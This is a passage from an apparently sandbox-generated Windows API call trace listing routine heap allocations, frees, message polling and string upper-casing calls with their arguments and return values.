(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0152.565] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0152.565] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0152.565] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0152.565] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0152.570] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.570] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.570] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0152.570] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0152.570] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.571] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0152.571] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0152.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0152.572] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0152.572] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0152.572] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0152.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0152.572] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0152.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0152.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0152.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0152.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0152.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8d0 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0152.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaaf8 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0152.574] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0152.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0152.574] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0152.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0152.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.575] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0152.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0152.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0152.577] 